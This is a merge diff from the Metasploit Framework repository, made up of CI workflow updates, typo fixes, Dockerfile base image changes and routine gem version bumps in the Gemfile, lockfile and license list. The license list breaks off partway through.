Land #17244 , Fix an error when a hostname fails to resolve

Don't bother with the address type
The address is returned in the packed format so it's always a string of either length 0 (resolution failed), length 4 (IPv4) or length 16 (IPv6). Anything else is invalid and will actually cause Rex::Socket.addr_ntoa to throw an error. All meterpreters today return the IP address in one of those three correct lengths.
2022-11-10 11:07:58 -06:00 · 2022-11-10 11:13:30 -05:00 · 2022-11-09 13:32:00 -06:00 · 2022-11-09 13:00:34 -06:00 · 2022-11-09 09:58:23 -06:00 · 2022-11-09 09:58:22 -06:00
841 changed files with 56386 additions and 14008 deletions
@@ -31,7 +31,7 @@ on:
 jobs:
  # Ensures that the docs site builds successfully. Note that this workflow does not deploy the docs site.
  build:
-    runs-on: ubuntu-18.04
+    runs-on: ubuntu-latest
    timeout-minutes: 40

    strategy:
@@ -43,7 +43,7 @@ jobs:
    name: Ruby ${{ matrix.ruby }}
    steps:
      - name: Checkout code
-        uses: actions/checkout@v2
+        uses: actions/checkout@v3

      - name: Setup Ruby
        uses: ruby/setup-ruby@v1
@@ -28,7 +28,7 @@ jobs:
  handle-labels:
    runs-on: ubuntu-latest
    steps:
-      - uses: actions/github-script@v3
+      - uses: actions/github-script@v6
        with:
          github-token: ${{secrets.GITHUB_TOKEN}}
          script: |
@@ -172,7 +172,7 @@ jobs:

                    This includes:

-                    - All of the item points within this [tempate](https://github.com/rapid7/metasploit-framework/blob/master/.github/ISSUE_TEMPLATE/bug_report.md)
+                    - All of the item points within this [template](https://github.com/rapid7/metasploit-framework/blob/master/.github/ISSUE_TEMPLATE/bug_report.md)
                    - The result of the \`debug\` command in your Metasploit console
                    - Screenshots showing the issues you're having
                    - Exact replication steps
@@ -202,16 +202,16 @@ jobs:

            if (config.comment) {
              const precedingWhitespaceLength = config.comment.split("\n")[1].search(/\S/);
-              const commentWithoutPreceedingWhitespace = config.comment.split("\n").map(line => line.substring(precedingWhitespaceLength)).join("\n").trim();
-              await github.issues.createComment({
+              const commentWithoutPrecedingWhitespace = config.comment.split("\n").map(line => line.substring(precedingWhitespaceLength)).join("\n").trim();
+              await github.rest.issues.createComment({
                issue_number: context.issue.number,
                owner: context.repo.owner,
                repo: context.repo.repo,
-                body: commentWithoutPreceedingWhitespace
+                body: commentWithoutPrecedingWhitespace
              });
            }
            if (config.close) {
-              await github.issues.update({
+              await github.rest.issues.update({
                  issue_number: context.issue.number,
                  owner: context.repo.owner,
                  repo: context.repo.repo,
@@ -28,14 +28,14 @@ on:

 jobs:
  msftidy:
-    runs-on: ubuntu-18.04
+    runs-on: ubuntu-latest
    timeout-minutes: 40

    strategy:
      fail-fast: true
      matrix:
        ruby:
-          - 2.6
+          - 2.7

    name: Lint msftidy
    steps:
@@ -43,7 +43,7 @@ jobs:
        run: sudo apt-get install libpcap-dev graphviz

      - name: Checkout code
-        uses: actions/checkout@v2
+        uses: actions/checkout@v3
        # Required to checkout HEAD^ and 3a046f01dae340c124dd3895e670983aef5fe0c5 for the msftidy script
        # https://github.com/actions/checkout/tree/5a4ac9002d0be2fb38bd78e4b4dbde5606d7042f#checkout-head
        with:
@@ -28,12 +28,12 @@ on:

 jobs:
  build:
-    runs-on: ubuntu-18.04
+    runs-on: ubuntu-latest
    timeout-minutes: 40
    name: Docker Build
    steps:
      - name: Checkout code
-        uses: actions/checkout@v2
+        uses: actions/checkout@v3

      - name: docker-compose build
        run: |
@@ -44,7 +44,7 @@ jobs:
          /usr/bin/docker-compose build

  test:
-    runs-on: ubuntu-18.04
+    runs-on: ${{ matrix.os }}
    timeout-minutes: 40

    services:
@@ -64,10 +64,19 @@ jobs:
      fail-fast: true
      matrix:
        ruby:
-          - 2.6
          - 2.7
-          - 3.0.3
-          - 3.1.1
+          - 3.0
+          - 3.1
+        os:
+          - ubuntu-20.04
+          - ubuntu-latest
+        exclude:
+          - { os: ubuntu-latest, ruby: 2.7 }
+          - { os: ubuntu-latest, ruby: 3.0 }
+        include:
+          - os: ubuntu-latest
+            ruby: 3.1
+            test_cmd: 'bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" DATASTORE_FALLBACKS=1'
        test_cmd:
          - bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content"
          - bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag ~content"
@@ -78,13 +87,13 @@ jobs:
    env:
      RAILS_ENV: test

-    name: Ruby ${{ matrix.ruby }} - ${{ matrix.test_cmd }}
+    name: ${{ matrix.os }} - Ruby ${{ matrix.ruby }} - ${{ matrix.test_cmd }}
    steps:
      - name: Install system dependencies
        run: sudo apt-get install libpcap-dev graphviz

      - name: Checkout code
-        uses: actions/checkout@v2
+        uses: actions/checkout@v3

      - name: Setup Ruby
        env:
@@ -3,6 +3,8 @@ Gemfile.local
 Gemfile.local.lock
 # Rubymine project directory
 .idea
+# Visual Studio Code configuration settings directory
+.vscode
 # Sublime Text project directory (not created by ST by default)
 .sublime-project
 # RVM control file, keep this to avoid backdooring Metasploit
@@ -36,7 +36,7 @@ when an individual is representing the project or its community.

 Instances of abusive, harassing, or otherwise unacceptable behavior may be
 reported by contacting the project maintainers at msfdev@metasploit.com. If
-the incident involves a committer, you may report directly to
+the incident involves a committer, you may report it directly to
 caitlin_condon@rapid7.com or todb@metasploit.com.

 All complaints will be reviewed and investigated and will result in a
@@ -1,4 +1,4 @@
-FROM ruby:3.0.2-alpine3.12 AS builder
+FROM ruby:3.0.4-alpine3.15 AS builder
 LABEL maintainer="Rapid7"

 ARG BUNDLER_CONFIG_ARGS="set clean 'true' set no-cache 'true' set system 'true' set without 'development test coverage'"
@@ -40,6 +40,7 @@ RUN apk add --no-cache \
    # needed so non root users can read content of the bundle
    && chmod -R a+r /usr/local/bundle

+ENV GO111MODULE=off
 RUN mkdir -p $TOOLS_HOME/bin && \
    cd $TOOLS_HOME/bin && \
    curl -O https://dl.google.com/go/go1.11.2.src.tar.gz && \
@@ -48,7 +49,7 @@ RUN mkdir -p $TOOLS_HOME/bin && \
    cd go/src && \
    ./make.bash

-FROM ruby:3.0.2-alpine3.12
+FROM ruby:3.0.4-alpine3.15
 LABEL maintainer="Rapid7"

 ENV APP_HOME=/usr/src/metasploit-framework
@@ -59,7 +60,9 @@ ENV METASPLOIT_GROUP=metasploit
 # used for the copy command
 RUN addgroup -S $METASPLOIT_GROUP

-RUN apk add --no-cache bash sqlite-libs nmap nmap-scripts nmap-nselibs postgresql-libs python2 python3 py3-pip ncurses libcap su-exec alpine-sdk python2-dev openssl-dev nasm mingw-w64-gcc
+RUN apk add --no-cache bash sqlite-libs nmap nmap-scripts nmap-nselibs \
+    postgresql-libs python2 python3 py3-pip ncurses libcap su-exec alpine-sdk \
+    python2-dev openssl-dev nasm mingw-w64-gcc

 RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which ruby)
 RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which nmap)
@@ -15,7 +15,11 @@ group :development do
  # generating documentation
  gem 'yard'
  # for development and testing purposes
-  gem 'pry-byebug'
+  # lock to version with 2.6 support until project updates
+  gem 'pry-byebug', '~> 3.9.0'
+  # Ruby Debugging Library - rebuilt and included by default from Ruby 3.1 onwards.
+  # Replaces the old lib/debug.rb and provides more features.
+  gem 'debug', '>= 1.0.0'
  # module documentation
  gem 'octokit'
  # memory profiling
@@ -24,7 +28,7 @@ group :development do
  gem 'ruby-prof', '1.4.2'
  # Metasploit::Aggregator external session proxy
  # disabled during 2.5 transition until aggregator is available
-  #gem 'metasploit-aggregator'
+  # gem 'metasploit-aggregator'
 end

 group :development, :test do
@@ -45,4 +49,3 @@ group :test do
  # Manipulate Time.now in specs
  gem 'timecop'
 end
-
@@ -1,7 +1,7 @@
 PATH
  remote: .
  specs:
-    metasploit-framework (6.2.4)
+    metasploit-framework (6.2.26)
      actionpack (~> 6.0)
      activerecord (~> 6.0)
      activesupport (~> 6.0)
@@ -30,9 +30,9 @@ PATH
      metasploit-concern
      metasploit-credential
      metasploit-model
-      metasploit-payloads (= 2.0.94)
+      metasploit-payloads (= 2.0.99)
      metasploit_data_models
-      metasploit_payloads-mettle (= 1.0.18)
+      metasploit_payloads-mettle (= 1.0.20)
      mqtt
      msgpack
      nessus_rest
@@ -42,7 +42,7 @@ PATH
      network_interface
      nexpose
      nokogiri
-      octokit
+      octokit (~> 4.0)
      openssl-ccm
      openvas-omp
      packetfu
@@ -55,7 +55,6 @@ PATH
      rb-readline
      recog
      redcarpet
-      reline (= 0.2.5)
      rex-arch
      rex-bin_tools
      rex-core
@@ -75,7 +74,7 @@ PATH
      rex-text
      rex-zip
      ruby-macho
-      ruby_smb (~> 3.1.0)
+      ruby_smb (~> 3.2.0)
      rubyntlm
      rubyzip
      sinatra
@@ -98,61 +97,61 @@ GEM
  remote: https://rubygems.org/
  specs:
    Ascii85 (1.1.0)
-    actionpack (6.1.6)
-      actionview (= 6.1.6)
-      activesupport (= 6.1.6)
+    actionpack (6.1.7)
+      actionview (= 6.1.7)
+      activesupport (= 6.1.7)
      rack (~> 2.0, >= 2.0.9)
      rack-test (>= 0.6.3)
      rails-dom-testing (~> 2.0)
      rails-html-sanitizer (~> 1.0, >= 1.2.0)
-    actionview (6.1.6)
-      activesupport (= 6.1.6)
+    actionview (6.1.7)
+      activesupport (= 6.1.7)
      builder (~> 3.1)
      erubi (~> 1.4)
      rails-dom-testing (~> 2.0)
      rails-html-sanitizer (~> 1.1, >= 1.2.0)
-    activemodel (6.1.6)
-      activesupport (= 6.1.6)
-    activerecord (6.1.6)
-      activemodel (= 6.1.6)
-      activesupport (= 6.1.6)
-    activesupport (6.1.6)
+    activemodel (6.1.7)
+      activesupport (= 6.1.7)
+    activerecord (6.1.7)
+      activemodel (= 6.1.7)
+      activesupport (= 6.1.7)
+    activesupport (6.1.7)
      concurrent-ruby (~> 1.0, >= 1.0.2)
      i18n (>= 1.6, < 2)
      minitest (>= 5.1)
      tzinfo (~> 2.0)
      zeitwerk (~> 2.3)
-    addressable (2.8.0)
-      public_suffix (>= 2.0.2, < 5.0)
+    addressable (2.8.1)
+      public_suffix (>= 2.0.2, < 6.0)
    afm (0.2.2)
    arel-helpers (2.14.0)
      activerecord (>= 3.1.0, < 8)
    ast (2.4.2)
    aws-eventstream (1.2.0)
-    aws-partitions (1.598.0)
-    aws-sdk-core (3.131.1)
+    aws-partitions (1.648.0)
+    aws-sdk-core (3.162.0)
      aws-eventstream (~> 1, >= 1.0.2)
      aws-partitions (~> 1, >= 1.525.0)
      aws-sigv4 (~> 1.1)
      jmespath (~> 1, >= 1.6.1)
-    aws-sdk-ec2 (1.317.0)
+    aws-sdk-ec2 (1.341.0)
      aws-sdk-core (~> 3, >= 3.127.0)
      aws-sigv4 (~> 1.1)
-    aws-sdk-iam (1.69.0)
+    aws-sdk-iam (1.71.0)
      aws-sdk-core (~> 3, >= 3.127.0)
      aws-sigv4 (~> 1.1)
-    aws-sdk-kms (1.57.0)
+    aws-sdk-kms (1.58.0)
      aws-sdk-core (~> 3, >= 3.127.0)
      aws-sigv4 (~> 1.1)
-    aws-sdk-s3 (1.114.0)
+    aws-sdk-s3 (1.115.0)
      aws-sdk-core (~> 3, >= 3.127.0)
      aws-sdk-kms (~> 1)
      aws-sigv4 (~> 1.4)
-    aws-sigv4 (1.5.0)
+    aws-sigv4 (1.5.2)
      aws-eventstream (~> 1, >= 1.0.2)
    bcrypt (3.1.18)
    bcrypt_pbkdf (1.1.0)
-    bindata (2.4.10)
+    bindata (2.4.13)
    bson (4.15.0)
    builder (3.2.4)
    byebug (11.1.3)
@@ -161,8 +160,10 @@ GEM
    cookiejar (0.3.3)
    crass (1.0.6)
    daemons (1.4.1)
+    debug (1.6.2)
+      irb (>= 1.3.6)
+      reline (>= 0.3.1)
    diff-lcs (1.5.0)
-    digest (3.1.0)
    dnsruby (1.61.9)
      simpleidn (~> 0.1)
    docile (1.4.0)
@@ -177,20 +178,21 @@ GEM
      http_parser.rb (>= 0.6.0)
    em-socksify (0.3.2)
      eventmachine (>= 1.0.0.beta.4)
-    erubi (1.10.0)
+    erubi (1.11.0)
    eventmachine (1.2.7)
    factory_bot (6.2.1)
      activesupport (>= 5.0.0)
    factory_bot_rails (6.2.0)
      factory_bot (~> 6.2.0)
      railties (>= 5.0.0)
-    faker (2.21.0)
+    faker (2.23.0)
      i18n (>= 1.8.11, < 2)
-    faraday (2.3.0)
-      faraday-net_http (~> 2.0)
+    faraday (2.6.0)
+      faraday-net_http (>= 2.0, < 3.1)
      ruby2_keywords (>= 0.0.4)
-    faraday-net_http (2.0.3)
-    faraday-retry (1.0.3)
+    faraday-net_http (3.0.1)
+    faraday-retry (2.0.0)
+      faraday (~> 2.0)
    faye-websocket (0.11.1)
      eventmachine (>= 0.12.0)
      websocket-driver (>= 0.5.1)
@@ -211,11 +213,11 @@ GEM
      domain_name (~> 0.5)
    http_parser.rb (0.8.0)
    httpclient (2.8.3)
-    i18n (1.10.0)
+    i18n (1.12.0)
      concurrent-ruby (~> 1.0)
    io-console (0.5.11)
-    irb (1.3.6)
-      reline (>= 0.2.5)
+    irb (1.4.2)
+      reline (>= 0.3.0)
    jmespath (1.6.1)
    jsobfu (0.4.2)
      rkelly-remix
@@ -224,16 +226,16 @@ GEM
    logging (2.3.1)
      little-plugger (~> 1.1)
      multi_json (~> 1.14)
-    loofah (2.18.0)
+    loofah (2.19.0)
      crass (~> 1.0.2)
      nokogiri (>= 1.5.9)
    memory_profiler (1.0.0)
    metasm (1.0.5)
-    metasploit-concern (4.0.4)
+    metasploit-concern (4.0.5)
      activemodel (~> 6.0)
      activesupport (~> 6.0)
      railties (~> 6.0)
-    metasploit-credential (5.0.7)
+    metasploit-credential (5.0.9)
      metasploit-concern
      metasploit-model
      metasploit_data_models (>= 5.0.0)
@@ -243,11 +245,11 @@ GEM
      rex-socket
      rubyntlm
      rubyzip
-    metasploit-model (4.0.4)
+    metasploit-model (4.0.6)
      activemodel (~> 6.0)
      activesupport (~> 6.0)
      railties (~> 6.0)
-    metasploit-payloads (2.0.94)
+    metasploit-payloads (2.0.99)
    metasploit_data_models (5.0.5)
      activerecord (~> 6.0)
      activesupport (~> 6.0)
@@ -258,41 +260,39 @@ GEM
      railties (~> 6.0)
      recog (~> 2.0)
      webrick
-    metasploit_payloads-mettle (1.0.18)
+    metasploit_payloads-mettle (1.0.20)
    method_source (1.0.0)
    mini_portile2 (2.8.0)
-    minitest (5.15.0)
+    minitest (5.16.3)
    mqtt (0.5.0)
-    msgpack (1.5.2)
+    msgpack (1.6.0)
    multi_json (1.15.0)
-    mustermann (1.1.1)
+    mustermann (3.0.0)
      ruby2_keywords (~> 0.0.1)
    nessus_rest (0.1.6)
    net-ldap (0.17.1)
    net-protocol (0.1.3)
      timeout
-    net-smtp (0.3.1)
-      digest
+    net-smtp (0.3.2)
      net-protocol
-      timeout
-    net-ssh (6.1.0)
+    net-ssh (7.0.1)
    network_interface (0.0.2)
    nexpose (7.3.0)
    nio4r (2.5.8)
-    nokogiri (1.13.6)
+    nokogiri (1.13.9)
      mini_portile2 (~> 2.8.0)
      racc (~> 1.4)
    nori (2.6.0)
-    octokit (4.24.0)
+    octokit (4.25.1)
      faraday (>= 1, < 3)
      sawyer (~> 0.9)
-    openssl-ccm (1.2.2)
-    openssl-cmac (2.0.1)
+    openssl-ccm (1.2.3)
+    openssl-cmac (2.0.2)
    openvas-omp (0.0.4)
    packetfu (1.1.13)
      pcaprub
    parallel (1.22.1)
-    parser (3.1.2.0)
+    parser (3.1.2.1)
      ast (~> 2.4.1)
    patch_finder (1.0.2)
    pcaprub (0.13.1)
@@ -302,30 +302,30 @@ GEM
      hashery (~> 2.0)
      ruby-rc4
      ttfunk
-    pg (1.3.5)
+    pg (1.4.4)
    pry (0.13.1)
      coderay (~> 1.1)
      method_source (~> 1.0)
    pry-byebug (3.9.0)
      byebug (~> 11.0)
      pry (~> 0.13.0)
-    public_suffix (4.0.7)
-    puma (5.6.4)
+    public_suffix (5.0.0)
+    puma (6.0.0)
      nio4r (~> 2.0)
    racc (1.6.0)
-    rack (2.2.3.1)
-    rack-protection (2.2.0)
+    rack (2.2.4)
+    rack-protection (3.0.2)
      rack
-    rack-test (1.1.0)
-      rack (>= 1.0, < 3)
+    rack-test (2.0.2)
+      rack (>= 1.3)
    rails-dom-testing (2.0.3)
      activesupport (>= 4.2.0)
      nokogiri (>= 1.6)
    rails-html-sanitizer (1.4.3)
      loofah (~> 2.3)
-    railties (6.1.6)
-      actionpack (= 6.1.6)
-      activesupport (= 6.1.6)
+    railties (6.1.7)
+      actionpack (= 6.1.7)
+      activesupport (= 6.1.7)
      method_source
      rake (>= 12.2)
      thor (~> 1.0)
@@ -335,8 +335,8 @@ GEM
    recog (2.3.23)
      nokogiri
    redcarpet (3.5.1)
-    regexp_parser (2.5.0)
-    reline (0.2.5)
+    regexp_parser (2.6.0)
+    reline (0.3.1)
      io-console (~> 0.5)
    rex-arch (0.1.14)
      rex-text
@@ -351,7 +351,7 @@ GEM
      metasm
      rex-arch
      rex-text
-    rex-exploitation (0.1.30)
+    rex-exploitation (0.1.36)
      jsobfu
      metasm
      rex-arch
@@ -365,25 +365,25 @@ GEM
      rex-arch
    rex-ole (0.1.7)
      rex-text
-    rex-powershell (0.1.96)
+    rex-powershell (0.1.97)
      rex-random_identifier
      rex-text
      ruby-rc4
-    rex-random_identifier (0.1.8)
+    rex-random_identifier (0.1.9)
      rex-text
    rex-registry (0.1.4)
    rex-rop_builder (0.1.4)
      metasm
      rex-core
      rex-text
-    rex-socket (0.1.39)
+    rex-socket (0.1.43)
      rex-core
-    rex-sslscan (0.1.7)
+    rex-sslscan (0.1.8)
      rex-core
      rex-socket
      rex-text
    rex-struct2 (0.1.3)
-    rex-text (0.2.37)
+    rex-text (0.2.46)
    rex-zip (0.1.4)
      rex-text
    rexml (3.2.5)
@@ -394,40 +394,41 @@ GEM
      rspec-mocks (~> 3.11.0)
    rspec-core (3.11.0)
      rspec-support (~> 3.11.0)
-    rspec-expectations (3.11.0)
+    rspec-expectations (3.11.1)
      diff-lcs (>= 1.2.0, < 2.0)
      rspec-support (~> 3.11.0)
    rspec-mocks (3.11.1)
      diff-lcs (>= 1.2.0, < 2.0)
      rspec-support (~> 3.11.0)
-    rspec-rails (5.1.2)
-      actionpack (>= 5.2)
-      activesupport (>= 5.2)
-      railties (>= 5.2)
-      rspec-core (~> 3.10)
-      rspec-expectations (~> 3.10)
-      rspec-mocks (~> 3.10)
-      rspec-support (~> 3.10)
+    rspec-rails (6.0.1)
+      actionpack (>= 6.1)
+      activesupport (>= 6.1)
+      railties (>= 6.1)
+      rspec-core (~> 3.11)
+      rspec-expectations (~> 3.11)
+      rspec-mocks (~> 3.11)
+      rspec-support (~> 3.11)
    rspec-rerun (1.1.0)
      rspec (~> 3.0)
-    rspec-support (3.11.0)
-    rubocop (1.30.1)
+    rspec-support (3.11.1)
+    rubocop (1.37.0)
+      json (~> 2.3)
      parallel (~> 1.10)
-      parser (>= 3.1.0.0)
+      parser (>= 3.1.2.1)
      rainbow (>= 2.2.2, < 4.0)
      regexp_parser (>= 1.8, < 3.0)
      rexml (>= 3.2.5, < 4.0)
-      rubocop-ast (>= 1.18.0, < 2.0)
+      rubocop-ast (>= 1.22.0, < 2.0)
      ruby-progressbar (~> 1.7)
      unicode-display_width (>= 1.4.0, < 3.0)
-    rubocop-ast (1.18.0)
+    rubocop-ast (1.22.0)
      parser (>= 3.1.1.0)
    ruby-macho (3.0.0)
    ruby-prof (1.4.2)
    ruby-progressbar (1.11.0)
    ruby-rc4 (0.1.5)
    ruby2_keywords (0.0.5)
-    ruby_smb (3.1.3)
+    ruby_smb (3.2.0)
      bindata
      openssl-ccm
      openssl-cmac
@@ -444,12 +445,13 @@ GEM
    simplecov-html (0.12.3)
    simpleidn (0.2.1)
      unf (~> 0.1.4)
-    sinatra (2.2.0)
-      mustermann (~> 1.0)
-      rack (~> 2.2)
-      rack-protection (= 2.2.0)
+    sinatra (3.0.2)
+      mustermann (~> 3.0)
+      rack (~> 2.2, >= 2.2.4)
+      rack-protection (= 3.0.2)
      tilt (~> 2.0)
-    sqlite3 (1.4.2)
+    sqlite3 (1.5.3)
+      mini_portile2 (~> 2.8.0)
    sshkey (2.0.0)
    swagger-blocks (3.0.0)
    thin (1.8.1)
@@ -457,18 +459,18 @@ GEM
      eventmachine (~> 1.0, >= 1.0.4)
      rack (>= 1, < 3)
    thor (1.2.1)
-    tilt (2.0.10)
+    tilt (2.0.11)
    timecop (0.9.5)
    timeout (0.3.0)
    ttfunk (1.7.0)
-    tzinfo (2.0.4)
+    tzinfo (2.0.5)
      concurrent-ruby (~> 1.0)
-    tzinfo-data (1.2022.1)
+    tzinfo-data (1.2022.5)
      tzinfo (>= 1.0.0)
    unf (0.1.4)
      unf_ext
    unf_ext (0.0.8.2)
-    unicode-display_width (2.1.0)
+    unicode-display_width (2.3.0)
    unix-crypt (1.3.0)
    warden (1.2.9)
      rack (>= 2.0.9)
@@ -494,18 +496,19 @@ GEM
      webrick
    yard (0.9.28)
      webrick (~> 1.7.0)
-    zeitwerk (2.5.4)
+    zeitwerk (2.6.1)

 PLATFORMS
  ruby

 DEPENDENCIES
+  debug (>= 1.0.0)
  factory_bot_rails
  fivemat
  memory_profiler
  metasploit-framework!
  octokit
-  pry-byebug
+  pry-byebug (~> 3.9.0)
  rake
  redcarpet
  rspec-rails
@@ -15,6 +15,10 @@ License: BSD-3-clause
 # Last updated: 2013-Nov-04
 #

+Files: data/headers/windows/c_payload_util/beacon.h
+Copyright: 2022, Copyright Help/Systems LLC and its group of companies.
+License: Apache 2.0
+
 Files: data/exploits/mysql/lib_mysqludf_sys_*.so
 Copyright: 2007  Roland Bouman
           2008-2010  Roland Bouman and Bernardo Damele A. G.
@@ -1,25 +1,25 @@
 This file is auto-generated by tools/dev/update_gem_licenses.sh
 Ascii85, 1.1.0, MIT
-actionpack, 6.1.6, MIT
-actionview, 6.1.6, MIT
-activemodel, 6.1.6, MIT
-activerecord, 6.1.6, MIT
-activesupport, 6.1.6, MIT
-addressable, 2.8.0, "Apache 2.0"
+actionpack, 6.1.7, MIT
+actionview, 6.1.7, MIT
+activemodel, 6.1.7, MIT
+activerecord, 6.1.7, MIT
+activesupport, 6.1.7, MIT
+addressable, 2.8.1, "Apache 2.0"
 afm, 0.2.2, MIT
 arel-helpers, 2.14.0, MIT
 ast, 2.4.2, MIT
 aws-eventstream, 1.2.0, "Apache 2.0"
-aws-partitions, 1.598.0, "Apache 2.0"
-aws-sdk-core, 3.131.1, "Apache 2.0"
-aws-sdk-ec2, 1.317.0, "Apache 2.0"
-aws-sdk-iam, 1.69.0, "Apache 2.0"
-aws-sdk-kms, 1.57.0, "Apache 2.0"
-aws-sdk-s3, 1.114.0, "Apache 2.0"
-aws-sigv4, 1.5.0, "Apache 2.0"
+aws-partitions, 1.648.0, "Apache 2.0"
+aws-sdk-core, 3.162.0, "Apache 2.0"
+aws-sdk-ec2, 1.341.0, "Apache 2.0"
+aws-sdk-iam, 1.71.0, "Apache 2.0"
+aws-sdk-kms, 1.58.0, "Apache 2.0"
+aws-sdk-s3, 1.115.0, "Apache 2.0"
+aws-sigv4, 1.5.2, "Apache 2.0"
 bcrypt, 3.1.18, MIT
 bcrypt_pbkdf, 1.1.0, MIT
-bindata, 2.4.10, ruby
+bindata, 2.4.13, ruby
 bson, 4.15.0, "Apache 2.0"
 builder, 3.2.4, MIT
 bundler, 2.1.4, MIT
@@ -29,22 +29,22 @@ concurrent-ruby, 1.0.5, MIT
 cookiejar, 0.3.3, unknown
 crass, 1.0.6, MIT
 daemons, 1.4.1, MIT
+debug, 1.6.2, "ruby, Simplified BSD"
 diff-lcs, 1.5.0, "MIT, Artistic-2.0, GPL-2.0+"
-digest, 3.1.0, "ruby, Simplified BSD"
 dnsruby, 1.61.9, "Apache 2.0"
 docile, 1.4.0, MIT
 domain_name, 0.5.20190701, "Simplified BSD, New BSD, Mozilla Public License 2.0"
 ed25519, 1.3.0, MIT
 em-http-request, 1.1.7, MIT
 em-socksify, 0.3.2, MIT
-erubi, 1.10.0, MIT
+erubi, 1.11.0, MIT
 eventmachine, 1.2.7, "ruby, GPL-2.0"
 factory_bot, 6.2.1, MIT
 factory_bot_rails, 6.2.0, MIT
-faker, 2.21.0, MIT
-faraday, 2.3.0, MIT
-faraday-net_http, 2.0.3, MIT
-faraday-retry, 1.0.3, MIT
+faker, 2.23.0, MIT
+faraday, 2.6.0, MIT
+faraday-net_http, 3.0.1, MIT
+faraday-retry, 2.0.0, MIT
 faye-websocket, 0.11.1, "Apache 2.0"
 ffi, 1.15.5, "New BSD"
 filesize, 0.2.0, MIT
@@ -57,126 +57,126 @@ hrr_rb_ssh-ed25519, 0.4.2, "Apache 2.0"
 http-cookie, 1.0.5, MIT
 http_parser.rb, 0.8.0, MIT
 httpclient, 2.8.3, ruby
-i18n, 1.10.0, MIT
+i18n, 1.12.0, MIT
 io-console, 0.5.11, "ruby, Simplified BSD"
-irb, 1.3.6, "ruby, Simplified BSD"
+irb, 1.4.2, "ruby, Simplified BSD"
 jmespath, 1.6.1, "Apache 2.0"
 jsobfu, 0.4.2, "New BSD"
 json, 2.6.2, ruby
 little-plugger, 1.1.4, MIT
 logging, 2.3.1, MIT
-loofah, 2.18.0, MIT
+loofah, 2.19.0, MIT
 memory_profiler, 1.0.0, MIT
 metasm, 1.0.5, LGPL-2.1
-metasploit-concern, 4.0.4, "New BSD"
-metasploit-credential, 5.0.7, "New BSD"
-metasploit-framework, 6.2.4, "New BSD"
-metasploit-model, 4.0.4, "New BSD"
-metasploit-payloads, 2.0.93, "3-clause (or ""modified"") BSD"
+metasploit-concern, 4.0.5, "New BSD"
+metasploit-credential, 5.0.9, "New BSD"
+metasploit-framework, 6.2.26, "New BSD"
+metasploit-model, 4.0.6, "New BSD"
+metasploit-payloads, 2.0.99, "3-clause (or ""modified"") BSD"
 metasploit_data_models, 5.0.5, "New BSD"
-metasploit_payloads-mettle, 1.0.18, "3-clause (or ""modified"") BSD"
+metasploit_payloads-mettle, 1.0.20, "3-clause (or ""modified"") BSD"
 method_source, 1.0.0, MIT
 mini_portile2, 2.8.0, MIT
-minitest, 5.15.0, MIT
+minitest, 5.16.3, MIT
 mqtt, 0.5.0, MIT
-msgpack, 1.5.2, "Apache 2.0"
+msgpack, 1.6.0, "Apache 2.0"
 multi_json, 1.15.0, MIT
-mustermann, 1.1.1, MIT
+mustermann, 3.0.0, MIT
 nessus_rest, 0.1.6, MIT
 net-ldap, 0.17.1, MIT
 net-protocol, 0.1.3, "ruby, Simplified BSD"
-net-smtp, 0.3.1, "ruby, Simplified BSD"
-net-ssh, 6.1.0, MIT
+net-smtp, 0.3.2, "ruby, Simplified BSD"
+net-ssh, 7.0.1, MIT
 network_interface, 0.0.2, MIT
 nexpose, 7.3.0, "New BSD"
 nio4r, 2.5.8, MIT
-nokogiri, 1.13.6, MIT
+nokogiri, 1.13.9, MIT
 nori, 2.6.0, MIT
-octokit, 4.24.0, MIT
-openssl-ccm, 1.2.2, MIT
-openssl-cmac, 2.0.1, MIT
+octokit, 4.25.1, MIT
+openssl-ccm, 1.2.3, MIT
+openssl-cmac, 2.0.2, MIT
 openvas-omp, 0.0.4, MIT
 packetfu, 1.1.13, BSD
 parallel, 1.22.1, MIT
-parser, 3.1.2.0, MIT
+parser, 3.1.2.1, MIT
 patch_finder, 1.0.2, "New BSD"
 pcaprub, 0.13.1, LGPL-2.1
 pdf-reader, 2.10.0, MIT
-pg, 1.3.5, "Simplified BSD"
+pg, 1.4.4, "Simplified BSD"
 pry, 0.13.1, MIT
 pry-byebug, 3.9.0, MIT
-public_suffix, 4.0.7, MIT
-puma, 5.6.4, "New BSD"
+public_suffix, 5.0.0, MIT
+puma, 6.0.0, "New BSD"
 racc, 1.6.0, "ruby, Simplified BSD"
-rack, 2.2.3.1, MIT
-rack-protection, 2.2.0, MIT
-rack-test, 1.1.0, MIT
+rack, 2.2.4, MIT
+rack-protection, 3.0.2, MIT
+rack-test, 2.0.2, MIT
 rails-dom-testing, 2.0.3, MIT
 rails-html-sanitizer, 1.4.3, MIT
-railties, 6.1.6, MIT
+railties, 6.1.7, MIT
 rainbow, 3.1.1, MIT
 rake, 13.0.6, MIT
 rb-readline, 0.5.5, BSD
 recog, 2.3.23, unknown
 redcarpet, 3.5.1, MIT
-regexp_parser, 2.5.0, MIT
-reline, 0.2.5, ruby
+regexp_parser, 2.6.0, MIT
+reline, 0.3.1, ruby
 rex-arch, 0.1.14, "New BSD"
 rex-bin_tools, 0.1.8, "New BSD"
 rex-core, 0.1.28, "New BSD"
 rex-encoder, 0.1.6, "New BSD"
-rex-exploitation, 0.1.30, "New BSD"
+rex-exploitation, 0.1.36, "New BSD"
 rex-java, 0.1.6, "New BSD"
 rex-mime, 0.1.7, "New BSD"
 rex-nop, 0.1.2, "New BSD"
 rex-ole, 0.1.7, "New BSD"
-rex-powershell, 0.1.96, "New BSD"
-rex-random_identifier, 0.1.8, "New BSD"
+rex-powershell, 0.1.97, "New BSD"
+rex-random_identifier, 0.1.9, "New BSD"
 rex-registry, 0.1.4, "New BSD"
 rex-rop_builder, 0.1.4, "New BSD"
-rex-socket, 0.1.39, "New BSD"
-rex-sslscan, 0.1.7, "New BSD"
+rex-socket, 0.1.43, "New BSD"
+rex-sslscan, 0.1.8, "New BSD"
 rex-struct2, 0.1.3, "New BSD"
-rex-text, 0.2.37, "New BSD"
+rex-text, 0.2.46, "New BSD"
 rex-zip, 0.1.4, "New BSD"
 rexml, 3.2.5, "Simplified BSD"
 rkelly-remix, 0.0.7, MIT
 rspec, 3.11.0, MIT
 rspec-core, 3.11.0, MIT
-rspec-expectations, 3.11.0, MIT
